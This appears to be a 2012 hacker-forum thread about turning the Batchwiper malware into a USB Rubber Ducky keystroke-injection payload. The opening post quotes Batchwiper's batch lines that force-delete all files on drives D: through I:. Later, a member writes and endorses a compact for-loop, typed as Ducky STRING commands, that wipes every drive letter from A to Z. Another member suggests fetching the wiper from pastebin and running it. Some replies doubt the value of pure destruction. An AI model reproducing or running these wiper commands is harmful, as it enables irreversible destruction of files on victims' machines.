[Suggestion] Batchwiper payload via Ducky?

[Darren Kitchen]

The Iranian CERT has posted notification on a piece of destructive malware based on simple batch files. AlienVault Labs has a writeup here:

http://labs.alienvault.com/labs/index.php/2012/batchwiper-just-another-wiping-malware/

They posit that this could be spread by USB.

I'm thinking it would be incredibly simple to adapt this into ducky script.

Not saying you should go formatting drives, just an interesting observation. I mean it literally is dead simple, look at this code snippet:

sleep for 3000
IF EXIST d:\ del “d:\*.*” /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del “e:\*.*” /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del “f:\*.*” /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del “g:\*.*” /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del “h:\*.*” /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del “i:\*.*” /q /s /f
IF EXIST i:\ Chkdsk i:
[/CODE]
What are your thoughts on this?

[01000010]

Its like carrying around a hammer and breaking the screen, Whats the point other than destruction.

I guess the hammer would be better because it doesn't need any privileges.

Edited December 18, 2012 by leapole

[Xcellerator]

Looks interesting.. Not often you see malware written in batch! I wonder what the reasoning behind it was? The selective dates make it look like a very bespoke but of work meant to target quite a specific group.

As far as porting to the Ducky, it shouldn't be too hard, perhaps the quickest would be to download the batch script from pastebin and run it?

[no42]

Hmmm, rather destructive.

From a commercial perspective - it would waste time and money. A decent forensic analysis should be able to recover data, again costing money.

From a home user perspective - it would be really annoying. Specially if I had the family camera connected!

Again your relying on user permissions, at home (likely an admin user) at work (likely a low level grunt).

Probably, achievable through executing the commands through multiple run-box's.

From an infection perspective, wouldnt it be better to write a malicious script in visual-basic or wscript to append that script (if permissions allow) to any *.bat file detected on the system (including attached drives).

We already know the ducky can call a script/binary from mass storage (therefore not reliant on internet connection for payload delivery).

[Darren Kitchen]

And from a government attempting to slow down Iran's attempts at developing nuclear weapons perspective?

[no42]

If I was .gov funded, I would do something more along the lines of http://media.blackhat.com/bh-us-11/Davis/BH_US_11-Davis_USB_Slides.pdf

the Ducky is a possible platform to exploit USB driver vulnerabilities. Its just hassle to find them, most of the easy exploitable bugs are now patched (in common drivers).

[01000010]

I would hope any nuclear research facility would be running some kind of back up or something.

Now I know there are stupid people everywhere

I think the best way to mess with someone would not be blank there hard drive ( throws up a giant warning flag ) but to just modify a few section of a couple files ( takes forever to figure this out ).

As an example what if someone changed a few resistors on the file for the rubber ducky -- Would you check that before getting it manufactured.

this just reminds me of telling people new to linux

rm -rf /

Edited December 18, 2012 by leapole

[Xcellerator]

Page 27 of the PowerPoint midnitesnake posted contains the line:

The knowledge of how to emulate USB devices is not widespread

Interesting quote...

[reflex]

I would hope any nuclear research facility would be running some kind of back up or something.

Now I know there are stupid people everywhere

I think the best way to mess with someone would not be blank there hard drive ( throws up a giant warning flag ) but to just modify a few section of a couple files ( takes forever to figure this out ).

As an example what if someone changed a few resistors on the file for the rubber ducky -- Would you check that before getting it manufactured.

this just reminds me of telling people new to linux

rm -rf /

I would hope that any nuclear research facility wouldnt be running some kind of back up, If these weapons didnt exist the world would be a much safer place :)

[PineDominator]

Could make a script that auto runs and very slowly populates the c drive with copies of files in every folder

Call it Re.Frager

[01000010]

ooo can anyone say lots of little hidden files. Could take forever to index that stuff

[no42]

Page 27 of the PowerPoint midnitesnake posted contains the line:

The knowledge of how to emulate USB devices is not widespread

Interesting quote...

Yeah, the guy who wrote those slides cant even emulate USB devices. Thats where that quote comes from. I'd say the Teensy was quite widespread, since it was used to pwn the PS3. *cough*. Was speaking to him at Blackhat, he's just playing off other's work, that he mentioned on slide-10.

Philip Polstra (Uni of Dubuque) knows a lot more, and has written an interesting presentation & whitepaper:

Preventing “Oh Shit” Moments for €20 or Less - Black Hat

http://www.slideshar.../ppolstra/44con

Edited December 19, 2012 by midnitesnake

[Pwnd2Pwnr]

Kind of reminds me of the good 'ol c:\deltree .. :)

[overwraith]

Maybe modify that "for" loop I wrote to modify the SAM payload, to make the payload shorter.

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ del “%a:\*.*” /q /s /f)

haven't tested the above yet, for apparent reasons.

Edited December 19, 2012 by overwraith

[overwraith]

Ok, tested on a slightly modified command;

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ dir "%a:\*.*")

The command I posted in my previous reply should work.